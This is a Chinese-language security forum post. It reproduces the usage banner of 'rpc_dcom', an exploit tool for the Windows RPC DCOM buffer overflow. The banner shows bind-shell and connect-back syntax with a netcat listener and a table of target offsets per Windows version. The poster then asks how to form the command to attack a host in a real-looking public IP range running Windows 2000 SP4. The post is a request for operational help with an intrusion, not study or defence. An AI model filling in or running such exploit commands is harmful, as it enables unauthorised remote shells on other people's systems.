|
作者: wj7017654 [wj7017654] 论坛用户 | 登录 |
*:\>rpc_dcom RPC DCOM overflow Vulnerability discoveried by LSD Code by FlashSky,Flashsky xfocus org,benjurry,benjurry xfocus org Thanks for TopHacker!Use Win32 ShellCode (Win32sc.h) Version 1.3.0 Modified by sbaa(sbaa@163.net) 2003/07/28 ver 0.3 Usage:rpc_dcom Os[x(offset)] targetip ([bindport(1234)]|[localIP] [LocalPort]) rpc_dcom 7 127.0.0.1 (bind 1234) rpc_dcom 7 127.0.0.1 99 (bind 99) rpc_dcom 7 192.168.6.1 192.168.6.2 99 (connect back 192.168.6.2 99 ,run nc -l -p LocalPort before!) rpc_dcom x77e22c29 192.168.6.1 192.168.6.2 99 (use offset x77e22c29) windows nt sp6 (cn)-0 windows nt sp6 sp6a(cn)-1 Windows 2000 SP0 (cn)-2 Windows 2000 SP1 (cn)-3 Windows 2000 SP2 (cn)-4 Windows 2000 SP3 (cn)-5 Windows 2000 SP4 (cn)-6 Windows 2000 SP0 (jp)-7 Windows 2000 SP1 (jp)-8 Windows 2000 SP2 (jp)-9 Windows 2000 SP0 (kr)-10 Windows 2000 SP1 (kr)-11 Windows 2000 SP2 (kr)-12 Windows 2000 SP4 (kr)-13 Windows 2000 SP0 (mx)-14 Windows 2000 SP1 (mx)-15 Windows 2000 SP0 (english)-16 Windows 2000 SP1 (english)-17 Windows 2000 SP2 (english)-18 Windows 2000 SP3 (english)-19 Windows 2000 SERVER SP3 (english)-20 Windows 2000 SP4 (english)-21 Windows XP SP0 (english)-22 Windows XP SP1 (english)-23 Windows xp SP1 (cn)-24 Windows 2000 SP3 (Big5)-25 Windows 2000 SP4 (Big5)-26 Windows Xp SP0 SP1 (Big5)-27 我假定目标IP是218.61.*.*,已知操作系统是2000SP4,应用网络中的命令行攻击程序rpc_dcom.exe,我的具体命令格式应该怎么写? 等待回答。 |
地主 发表时间: 07/30 16:13 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号